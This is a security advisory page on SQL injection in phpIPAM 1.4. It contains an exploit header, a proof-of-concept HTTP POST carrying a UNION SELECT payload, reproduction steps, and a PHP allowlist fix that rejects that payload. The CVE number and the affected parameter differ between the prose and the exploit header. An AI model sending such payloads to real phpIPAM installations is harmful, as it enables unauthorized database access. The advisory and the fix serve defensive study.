phpIPAM 1.4 SQL Injection
phpIPAM version 1.4 contained significant SQL Injection vulnerabilities. These flaws stemmed from insufficient sanitization and validation of user-supplied input before its inclusion in database queries.

Specifically, parameters like `subnetId` in various scripts (e.g., `app/subnets/addresses.php`) were susceptible. An attacker could inject malicious SQL queries into these parameters, bypassing intended logic.

This allowed for unauthorized database access, enabling data exfiltration (e.g., user credentials, network topology), modification, or deletion of critical information. The vulnerabilities posed a serious risk to data integrity and confidentiality.

They were addressed in subsequent versions (e.g., 1.4.1) through the implementation of prepared statements and robust input filtering. A notable example is CVE-2019-17374.

# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693


Proof Of Concept
# Ensure you have a valid user session before executing the PoC.

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add


Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite. Ensure it includes a valid session cookie.
3. Observe the result.
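
The backtick in the PoC's `table` value suggests the parameter ends up inside a backtick-quoted identifier, and identifiers cannot be bound as prepared-statement parameters. The following is an added example (not phpIPAM's code or its actual patch) of validating such an identifier against an allowlist while binding the values; the allowlist contents, the `safe_table` and `count_rows` names, the query and the in-memory SQLite stand-in are all assumptions.

```php
<?php
declare(strict_types=1);

// Assumed allowlist of tables that may carry custom fields (names are illustrative).
const ALLOWED_TABLES = ['ipaddresses', 'subnets', 'vlans', 'devices'];

// Table names cannot be bound as statement parameters, so validate the
// identifier itself: plain-identifier syntax first, then exact allowlist match.
function safe_table(string $raw): string
{
    if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $raw) !== 1) {
        throw new InvalidArgumentException('table: not a plain identifier');
    }
    if (!in_array($raw, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('table: not in allowlist');
    }
    return $raw;
}

// Hypothetical handler: the identifier is validated then quoted, the value is bound.
function count_rows(PDO $db, array $post): int
{
    $table = safe_table((string)($post['table'] ?? ''));
    $stmt = $db->prepare("SELECT COUNT(*) FROM `$table` WHERE description = :d");
    $stmt->execute([':d' => (string)($post['current'] ?? '')]);
    return (int)$stmt->fetchColumn();
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subnets (id INTEGER PRIMARY KEY, description TEXT)');
$db->exec("INSERT INTO subnets (description) VALUES ('lab'), ('lab'), ('dmz')");

$bodies = [
    // Constructed benign request body.
    'table=subnets&current=lab&next=x&action=add',
    // Request body copied from the PoC on this page.
    'table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add',
];
foreach ($bodies as $body) {
    parse_str($body, $post); // same URL-decoding PHP applies to a form POST
    try {
        printf("%s => %d row(s)\n", json_encode($post['table']), count_rows($db, $post));
    } catch (InvalidArgumentException $e) {
        printf("%s => rejected (%s)\n", json_encode($post['table']), $e->getMessage());
    }
}
```

The syntax check alone stops the backtick breakout; the allowlist additionally keeps a well-formed but unintended table name out of the query.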
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.